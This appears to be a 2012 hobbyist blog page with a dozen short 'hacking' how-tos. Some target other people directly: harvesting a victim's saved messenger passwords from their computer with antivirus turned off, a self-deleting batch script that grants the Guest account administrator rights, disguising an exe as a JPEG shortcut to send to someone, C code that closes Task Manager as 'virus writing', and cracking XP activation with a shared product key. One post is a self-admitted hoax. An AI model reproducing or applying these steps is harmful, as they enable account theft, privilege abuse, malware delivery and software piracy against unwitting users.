<div style='background-color: none transparent;'></div>

Pages

The fight is not over!! MS is now moving .net to compile native, acknowledging the short comings in the .net framework. We need to demand a new vb6 that compiles our projects as they run today. Call, write, email, do what you can to put pressure on MS to bring back VB6!!! The new move by MS means they also acknowledge what we want is legitimate!!! Tell all your friends and colleagues to join in and help! Read more
Think Analytically, Verbalized what you have Thought, and Actualized what you had Verbalized... Read more
1 2 3 4 5 6 7
More Article »
More Article »
Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts

hacking

Friday, February 17, 2012

Continue Reading | comments

Learn how to hack Yahoo/MSN/AOL/Google

This is not actually hacking but recovering passwords .You can recover password oF Yahoo, Msn, Hotmal, Live, Google, Gmail, Aol, Aim, ICQ and a lot more Think a bit if you main motive is to get password anyway.

Now there are a bit of requirements

First you victim must have used a IM(instant messenger) at least once with this id. Say for yahoo he must use yahoo messenger.Online versions dont count.So this means you cannot hack accounts of say facebook or myspace which dont have their IM

Second you must have access to his comp where he has used the IM.

Third he must not have formatted his system recently or he must have used the IM after format.

These requirements are tough, i know.You will hit a jackpot if you are on shared comp as it's not frequently formatted and many use IM.You can even ask him to use the IM on your comp.Once you fullfill these job's almost done.

Now you can use these password recovery software to get hold of your victims password These softwares have high success rate but not 100%. I am giving all trial download links .If you want the full version visit your fav torrent or rapidshare or megaupload.The will not crack any passwords greater than 4 chars which mean syou cant hack most accounts as they require atleast 6 chars.

You will have to temporarily stop the Antivirus as your antivirus will detect it as spyware. But they are Spyware free !00% safe




Use this only to get lost passwords of your account. If you hack some one's account we wont take responsibility.
Continue Reading | comments

Brute Force - best hacking method

Brute force is the best hacking method as chances of getting password is very high.

The methods is very simple . But this method is cumbersome. Still most hacking software use this method due to high success rate .



This is how you do it. All that u need is the username and findout what is the max password length the software/site allows and also the minimum. say the minimum is 6 and max is 8. You have to start trying out all the combination.First all the six letter combos then seven then 8



aaaaaa

aaaaab

aaaaac

aaaaab

.

.

abaaaa

.

.

azzzzz

baaaaa

.

..

zzzzzz



Now once you do for 6 repeate the same for 7 and then for 8 . You will surely crack it.But the no of combos you need to try is very high.So in most cases you cannot use it but designed software do the job in few minutes. Check crack passwords section for such softwares to crack your software/site. This is best used to recover passwords of mobile phone . If use them for hacking it's crime.
Continue Reading | comments

Hacking victims

Just read along if you wish to hack any email that asks you the security question in case you forgot the password. This makes use of a bug present in most email(expect a few like earthlymail and electronicmail ) .There are several sites that claim to give you password by just sending an email but in that you also need to give your password.This is a fake thing you finally end up getting your id hacked.



This is a genuine method and is only for educational purpose. If you hack you are at your own.We will trick the server in thinking that the details(DOB/Securtity question & answer) you gave are true. Please read the enire post before you begin as you need to done somethings before you start composing.One important thing If you are hacking a Yahoo account compose/send mail from a Yahoo account only. If you dont have one then create it and then send.





Just compose a mail called FORGOT PASSWORD(all in caps)

Now you need to send this mail to ret_pass@**** .com(replace *** with Live/ Hotmail/MSN) OR retrieve_pass@**** .com(replace **** with Aol/AIM/Yahoo)

In the subject field type the following
id:$your victims's id$
Here is the trick we need to convince the server that the details that you give are the details of that id

secque: $give your security question$ (no ? after the question. In case it has a space for eg: "What is your pet" give it as what%20is%20your%pet i.e replace any space by %20)



For Yahoo it's security

secans: $give your security answer$ (Again here also if any space then replace the space by %20 For eg: if your answer is "Google Helper" give it as google%20helper)



For Yahoo it's security & for Aol/Aim it's secan

sdob: %$dob of your id$% No % needed for Yahoo

You may also be needed to give your Pincode as spin .

Once you send the mail the server will will not know what to do. The securtiy details of the id from which you sent mail are fully correct but id mentioned is something else. So instead of giving your password it gives password of the id metioned.

You should either get the password in 10-30 min or an error will be generated. I think by now you might have understood why i asked to send for the same mail provider.If not then the reason is how will MSN know details of your AOL mail.

And one more imprtant thing this method has a 95% success rate if you dont get up from your dream. This means that this post is all Bogus. You can never hack anyone by this method.This was just to show how easy you get fooled . I decided to make it look as complicated as possible to as trick.And i excluded earthly mail to give a indirect warning sign so that clever minds might be able to catch it)



If you didnt fall for it then great else boo go start writing snail/postal mail , web is not for you. Remember it's not easy to hack.Never follow any method given online.Also dont give your id to any who claims to give you the method one coz once you give your spam mail box would be always full.
Continue Reading | comments

Convert Exe to JPEG

Converting EXE to some other format say JPEG is easier than you think. This will not physically convert the exe file to jpeg. All that this does is this will trick someone including your OS to some extend in thinking that it's a jpeg file and thus opening/running the exe file. Ok i will use firefox.exe to show how you do it.



Create a new folder and copy the firefox.exe file into it. Now just create a shortcut of the file in the same folder. This shortcut is going to be the image(jpeg). Rename the shortcut to say, viruswriting.jpeg and original so vir.jpeg



remember these 2 files (original and shortcut) have to be in the same folder




























Now right click on the shortcut and delete the "Start in" field. Change th e target field to C:\WINDOWS\system32\cmd.exe /c vir.jpeg.



Now you need to change the icon of the shortcut file and the job is done. This trick is mainly for those who run their own server.This way when ever the person opens the shortcut the exe file will execute .



Note that both files have to be in the same folder and the user has to click on the shortcut and not on the original file. So if you are sending this to someone place both in the same folder and compress it . Now send the .zip or .rar file
Continue Reading | comments

IP gives it all

Most people wonder how do websites come to know of your location from IP.Now you too can find out.Forget users you can even sneak up on websites. Just enter IP/URL/mailid and vola all the details of are given.


Just visit visualroute . This has some great tools that will help you. You can enter IP/URL/Domain name and much more.

Here is a pic of what it can do (click on pic for a larger image). It gives your location. who is your internet provider, how you are connected to him.

What if you dont want to download any thing. then there are some online tools

Samspade.org
net4domain.com
visualware.com
Continue Reading | comments

Get details about any site

Wanted to know all the technical details about your favorite site like when was it registered, when was it started, where is it located, it's other details then we have a perfect solution.

http://www.allwhois.com/ is just the thing you need.

Let's look at Google.Com( below is not complete)


Domain Name: Google.com
Administrative Contact:
Google Inc.
1600 Amphitheatre Parkway Mountain View
CA
94043 US

Administrative Contact:
Google Inc.
1600 Amphitheatre Parkway Mountain View
CA
94043 US
dns-admin@google.com +1.6506234000 Fax- +1.6506188571

Technical Contact, Zone Contact:
Google Inc.
2400 E. Bay shore Pkwy Mountain View
CA
94043 US
dns-admin@google.com +1.6503300100 Fax- +1.6506181499

Created on..............: 1997-Sep-15.
Expires on..............: 2011-Sep-14.
Record last updated on..: 2006-Dec-29 14:38:40.

So Google.com was registered on 1997. This does not mean it was started on 1997 but it got registered on 1997 and went full fledged.. There is some good news for those wanting to buy domain. Google .com expires on 2011. If Google doesn't renew it you could get it.

Go go to allwhois.com and enter the domain name/ URL.Now scroll down in the text box and you will get all the details.
Continue Reading | comments

Make guest as admin

The below code will allow a guest to be a admin . You will not be the actual admin but will get admin privilages

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0


Copy this to notepad and save the file as "anyname.bat" . Now you need to execute it or run in the cmd screen.
Continue Reading | comments

Read emails without hacking

Actually the title is not 100% accurate. Yes you can read email without hacking but this is limited to only a few services. This is 100% safe and takes only 1 minute.

Simply go to Google and search "Reply to" or "fwd" as simple as that. If you are wondering how is this possible. Sometimes it so happens that some emails don't go securely like from those who maintain their own email server. these mails get cached. Also mails from before "nofollow" era can also be found.

In this method you wont get any emails from yahoo or msn or gmail or nay of the newer service providers but of big organizations that maintain their own email severs or some small email providers.You can even get mails sent to websites using forms. This is because of the post-get problem

Again just search for filetype:eml eml intext:"Content-Type: image/jpeg".

All that his is doing is searching for a file type eml with MIME Type/ Content-Type: image/jpeg. Whenever it has a .jpg file as attachment that line should come in .eml file.

http://www.google.com.pk/search?hl=en&q=filetype%3Aeml+eml+intext%3A%22Content-Type%
Continue Reading | comments

Virus code 2: Block/Disable any software

This is the virus writing basics section. Today we are going to show you how to block/disable software . This is demonstrated using c/c++.



I will demonstrate how can you disable stuffs/ software



How to block/dissable task manager?

This code will block task manager. Remember to keep all the spellings as it is any changes this wont work.



TaskMgr = FindWindow(NULL,"Windows Task Manager");

if( TaskMgr != NULL )

{

PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);

}



This code will block task manager. All that this code does is search for the Header on the window such as "Windows Task Manager". Now if a match is found it will disable that application.



How to Enable task manager ?

The method to enable task manager is given over here.



Now using this concept you can disable several such stuffs. Just replace the name of Windows Task Manager with the exact name of the software as appearing in the header.



You can integrate in this in your code and block any software .As all the info given over here is purely for educational purpose it's left upto the reader to make out what header file is needed.
Continue Reading | comments

Hacking through links

This is called as phishing. Though this method is popular in mails. Mails contain link that show some thing but point to some other site all together some thing like this .

http:/www.google.com /

This will direct you to goooole.com instead to google.com. Also note the change in link the actual link has to be http:// (second "/").

This could take you into some other site orkut.com link. Another popular thing is "http://www.okrut.com/GLogin". Did found any change. No. See again. The spelling of orkut.

This will take you into some page that looks same as original but is different site all together. So if you click on a hyperlink that asks you to login check the site's address however familar it looks. So be careful
Continue Reading | comments

Block/Unblock sites without software

You can block or even unblock sites without any software. Just follow these steps and you can continue acessing the file.


Go to Start >>> RUN .

Type C:\WINDOWS\system32\drivers\etc

Open the file "HOSTS" in a notepad

Under "127.0.0.1 localhost" . Add IP Name
IP - IP of the site to be blocked
Name - Name of the site

Example :
127.0.0.1 localhost
210.210.19.82 www.sifymall.com

Sifymall is now unaccessable . For every site after that you want block , just add "1" to the last number in the internal ip (127.0.0.2) and then the add like before.
Continue Reading | comments

Make Xp genuine

This is the simple and best way to crack Xp . This will make you Xp genuine

Go to Regedit (Start >> Run >>Type "regedit") .

Now go to go to HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion\WPAEvents

In that change the value of OOBETimer . Just change it to any other value.

Close it and go to Start >> Run

Type
"%systemroot%\system32\oobe\msoobe.exe /a"
(without quotes)

The activation screen will pop up.

Select "register over telephone."

Now click on CHANGE PRODUCT KEY

Now you can enTer the product key.



Now get the windows product key from someone and enter it. Job done now you Windows Xp is genuine.If you are hoping some site will give you a key then i am sorry. Most keys have been banned. The best way is go to your social networking site and request a product key. The best option is to go to a orkut community and request one.



Here is a key V2C47 MK7JD 3R89F D2KXW VPK3J dont blame me if this key is baned
Continue Reading | comments
 
Copyright © 2011. datasavvy . All Rights Reserved
Company Info | Contact Us | Privacy policy | Term of use | Widget | Advertise with Us | Site map
Template Modify by Creating Website . Inpire by Darkmatter Rockettheme Proudly powered by Blogger